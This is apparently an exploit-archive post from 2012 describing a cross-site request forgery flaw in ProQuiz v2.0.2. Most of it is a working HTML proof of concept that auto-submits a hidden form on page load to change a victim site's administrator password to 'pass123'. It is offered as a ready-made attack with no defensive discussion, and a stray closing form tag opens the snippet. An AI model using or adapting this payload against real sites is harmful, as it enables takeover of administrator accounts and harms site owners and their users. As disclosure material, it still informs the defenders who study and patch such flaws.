1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 |
########################################## [~] Exploit Title: ProQuiz v2.0.2 CSRF Vulnerability [~] Author: DaOne [~] Date: 19/8/2012 [~] Software Link: http://code.google.com/p/proquiz/downloads/list ########################################## [#] [ CSRF Change Admin Password ] </form> <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action="http://[target]/functions.php?action=edit_profile&type=password"> <input type="hidden" name="password" value="pass123"/> <input type="hidden" name="cpassword" value="pass123"/> </form> </body> </html> ########################################## |